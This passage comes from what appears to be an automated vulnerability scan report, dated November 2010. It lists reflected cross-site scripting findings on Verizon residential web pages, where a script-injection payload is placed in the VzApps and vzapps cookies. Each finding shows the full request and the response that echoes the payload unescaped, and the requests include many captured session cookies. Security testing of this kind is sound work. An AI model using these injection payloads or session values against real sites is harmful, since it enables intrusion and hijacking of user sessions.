RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TXc2e6b'><script>alert(1)</script>7d4ddb44747; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64628
Expires: Sun, 21 Nov 2010 18:30:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sun, 21 Nov 2010 18:30:58 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Sat, 20-Nov-2010 18:30:58 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sat, 20-Nov-2010 18:30:58 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sat, 20-Nov-2010 18:30:58 GMT; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC2E6B'><SCRIPT>ALERT(1)</SCRIPT>7D4DDB44747 ' />
...[SNIP]...

2.902. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bd1d1'><script>alert(1)</script>6e680d13017 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm?bannerid=BannerDry1m HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXbd1d1'><script>alert(1)</script>6e680d13017; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 62999
Expires: Sat, 20 Nov 2010 03:14:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:18 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXbd1d1'><script>alert(1)</script>6e680d13017; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXBD1D1'><SCRIPT>ALERT(1)</SCRIPT>6E680D13017 ' />
...[SNIP]...

2.903. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cdf59'><script>alert(1)</script>ece11e87003 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXcdf59'><script>alert(1)</script>ece11e87003; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64487
Expires: Sat, 20 Nov 2010 00:09:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:15 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXcdf59'><script>alert(1)</script>ece11e87003; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXCDF59'><SCRIPT>ALERT(1)</SCRIPT>ECE11E87003 ' />
...[SNIP]...

2.904. http://www22.verizon.com/Residential/HighSpeedInternet/Features/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Features/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ab748'><script>alert(1)</script>80592d937c4 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXab748'><script>alert(1)</script>80592d937c4; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92716
Expires: Sat, 20 Nov 2010 03:14:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:53 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXab748'><script>alert(1)</script>80592d937c4; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Features &amp; Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAB748'><SCRIPT>ALERT(1)</SCRIPT>80592D937C4 ' />
...[SNIP]...

2.905. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Features/Features.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 668ed'><script>alert(1)</script>bf2d4cd51f6 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX668ed'><script>alert(1)</script>bf2d4cd51f6; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 91146
Expires: Sat, 20 Nov 2010 03:14:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:14 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX668ed'><script>alert(1)</script>bf2d4cd51f6; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Features &amp; Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX668ED'><SCRIPT>ALERT(1)</SCRIPT>BF2D4CD51F6 ' />
...[SNIP]...

2.906. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5b24'><script>alert(1)</script>d2df3510f80 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc5b24'><script>alert(1)</script>d2df3510f80; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92742
Expires: Sat, 20 Nov 2010 00:12:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:19 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXc5b24'><script>alert(1)</script>d2df3510f80; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Features &amp; Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC5B24'><SCRIPT>ALERT(1)</SCRIPT>D2DF3510F80 ' />
...[SNIP]...

2.907. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8e301'><script>alert(1)</script>715a473175c was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
